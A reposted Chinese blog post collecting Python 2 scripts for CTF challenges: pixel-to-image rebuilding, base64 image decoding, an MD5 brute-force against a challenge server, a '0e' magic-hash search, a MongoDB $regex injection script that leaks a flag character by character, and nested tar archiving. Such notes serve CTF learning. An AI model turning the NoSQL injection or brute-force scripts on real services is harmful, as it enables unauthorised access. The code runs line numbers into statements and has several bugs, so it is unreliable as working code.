积累一点ctf需要掌握的常见脚本知识-白红宇

积累一点ctf需要掌握的常见脚本知识

阅读量：5259 次

发布时间：2019-06-14

本文共 3382 字，大约阅读时间需要 11 分钟。

1.利用像素点还原图片。

1 from PIL import Image 2 import re 3 if __name__ == '__main__': 4     x = 887 //将像素点个数进行分解，可以确定图片的长宽 5     y = 111 6     i = 0 7     j = 0 8       9     c = Image.new("RGB", (x,y))10     file_object = open('ce.txt') //ce.txt中保存着像素点的坐标11      12     for i in range(0,  x): 13         for j in range(0,  y):14             line = file_object.next() //每次读取一个像素点15             lst = line.split(",") //lst生成一个元组16             c.putpixel((i, j), (int(lst[0]), int(lst[1]), int(lst[2])))17      18     c.show()19     c.save("c.png")

2.py requests方法的利用以及利用正则匹配查找文本暴力破解md5值。

1 #coding : utf8 2 import requests 3 import re 4 import hashlib 5 import itertools 6 s = requests.session()  //建立一个session对话 7 url = "http://106.75.67.214:2050/?pass=bee7a613a8fa4f2f" 8 data = {
   'PHPSESSID':'6h7b4caq8bo41i3m5fg2983cq5'} 9 content = s.get(url=url,data=data)10 target = re.findall("sh\"\>(.*)\<",content.text) 11 target = target[0]12 poc = re.findall("code\"\>(.*)\<",content.text)13 str1 = poc[0]14 a = [''.join(x) for x in itertools.permutations(str1, 9)]  //join方法是通过指定的字符串来连接序列元素从而构成新字符串,permutations用来生成无重复字符的元组15 for i in range(0,len(a)):16 final = hashlib.md5(a[i])17 if final.hexdigest() == target:18 flag = s.get(url="http://106.75.67.214:2050/?code="+a[i])19 print flag.content20 print flag.headers

3.利用py将base64编码的字符串还原成图片

1 import os,base64   2 strs='''''sdasdas==''' //已经编码的base64字符串 3   4 imgdata=base64.b64decode(strs)  5 file=open('1.jpg','wb')  6 file.write(imgdata)  7 file.close()

4.生成0e哈希值：

1 #coding:utf-8 2 import hashlib 3 import itertools 4 def go(): 5     payload = [c for c in "qwertyuioplkjhgfdsazxcvbnm123654789"] 6     i = 0 7     print payload 8     for j in itertools.product(payload,repeat=30): #repeat参数指定长度 9         payloads = "".join(j)10         #print pow11         #i = i+ 112         #if i == 10:13         #    break14         str1 = hashlib.md5(payloads).hexdigest + "SALT"15         str2 = hashlib.md5(str1)16         if (str2[0]=="0") & (str2[1]=="e") & (str2[2:].isdigit()):17             print payloads18 go()

5.mongodb基于正则注入：

1 #coding:utf-8 2 import requests 3 import string 4 # print string.ascii_letters 5 # print string.digits 6 flag = "c1ctf{
    " 7 payload = string.ascii_letters + string.digits 8  9 url = "http://xx.x.x.x/index.php?"10 restsrt = True11 while restsrt:12     restsrt = False13     for i in payload:14         payloads = flag + i15         post_data = {
   "username":"admin","passwd[$regex]":flag+".*"}16         #post_data = {"username":"admin","passwd[$regex]":"^"+flag}17         r = requests.get(url = url,data = post_data,allow_redirects = False)18         if r.status_code == "302":19             print payloads20             flag = flag + i21             restsrt =True22             if i == "}":23                 exit(0)24             break25

6.多次压缩打包

1 #coding:utf-8 2 import tarfile 3 for i in range(1,2): 4     tfile = tarfile.open("shell0.tar.gz","w:gz") #打包压缩 5     tfile.add("flag.py") 6     tfile.close() 7  8 for i in range(1,300): 9     tfile = tarfile.open("shell"+str(i)+".tar.gz","w:gz")10     tfile.add("1.php")11     tfile.add("shell"+str(i-1)+".tar.gz")12     tfile.close()

7.多次解压：

1 #coding:utf-82 import tarfile3 for i in range(1,300)[::-1]:4     file = tarfile.open("shell"+str(i)+"tar.gz")5     file.extractall()6     file.close()

转载于:https://www.cnblogs.com/wfzWebSecuity/p/6067414.html

你可能感兴趣的文章